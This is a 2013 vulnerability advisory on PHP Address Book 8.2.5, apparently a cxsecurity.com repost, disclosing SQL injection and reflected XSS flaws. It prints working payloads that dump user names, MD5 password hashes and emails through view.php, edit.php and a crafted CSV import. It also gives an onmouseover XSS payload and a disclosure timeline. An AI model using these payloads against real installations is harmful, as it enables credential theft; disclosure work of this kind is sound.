PHP Address Book 8.2.5 Multiple vulnerabilities

2013.04.17
Credit: Team Doraemon.Sk8ers
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2013-1749 | CVE-2013-1748
CWE: CWE-89
CWE-79

There is a SQL injection vulnerability and reflected XSS in Simple PHP Address Book v8.2.5. The 2 vulnerabilities had been assigned the CVE identifier CVE-2013-1748 (SQLi) & CVE-2013-1749 (XSS) respectively. # Software Link: http://sourceforge.net/projects/php-addressbook/ # Version: v8.2.5 # Tested on: v8.2.5 # CVE : CVE-2013-1748 (SQLi) & CVE-2013-1749 (XSS) Details: ----------- * * *CVE-2013-1748 (SQLi)* We have discovered 3 pages which are prone to SQL Injection 1. /view.php?id=1 The "id" parameter is vulnerable to SQL injection Injection Vector: /view.php?id=-1' union select '1','2','3','4',(select username from users limit 1),(select md5_pass from users limit 1),(select email from users limit 1),'8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36','37','38','39','40','41 This injection vector will dump the username, md5 password and email of the first user in the user table onto the page itself 2. /edit.php Most of the fields on this page are vulnerable to SQL injection Injection Vector (inclusive of quotes): '+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+' This will dump out the ASCII value of the 1st character of the md5 password of the first user 3. /import.php The same injection vulnerability as Point 2 above is also present in the import function Using the same injection vector, saved in a csv file '+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+' Similarly, this injection vector will dump out the ASCII value of the 1st character of the md5 password of the first user The original input csv sample looks like this "Last name";"First name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail home";"Work";"Fax";"E-mail office";"Second address";"Second phone" "thelastname";"thefirstname";"13.09.1951";"Street";"1234";"city, Country";"+1 123 456 789";"+2 345 678 910";"first.last () mail1 com";"+3 456 789 101";"+4 567 897 011";"first.last () mail2 net";"second street, 1234 secondcity, secondcountry";"+5 678 910 111" The injected csv with the injected vectors looks like this "Last name";"First name";"Birthday";"Address";"ZIP";"City";"Home";"Mobile";"E-mail home";"Work";"Fax";"E-mail office";"Second address";"Second phone" "";"injectedthrucsv";"13.09.1951";"'+(select ASCII(SUBSTRING((SELECT md5_pass from users limit 1), 1)))+'";"";"city, Country";"+1 123 456 789";"+2 345 678 910";"first.last () mail1 com";"+3 456 789 101";"+4 567 897 011";"first.last () mail2 net";"second street, 1234 secondcity, secondcountry";"+5 678 910 111" *CVE-2013-1749 (XSS)* For the reflected XSS, we have identified the bug on edit.php 1. /edit.php Enter "onmouseover="alert(document.domain);" inclusive of the quotes into the "Address" field and click next On the next page, mouse over the First Name field to trigger the XSS * * Timeline: ------------- 15 Feb 2013: Emailed vendor on bugs found 21 Feb 2013: Emailed vendor again 14 Mar 2013: No response from vendor 17 April 2013: Advisory posted (No response from Vendor, published) Regards, Team Doraemon.Sk8ers

Referencje:

http://sourceforge.net/projects/php-addressbook/
http://seclists.org/oss-sec/2013/q2/31


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top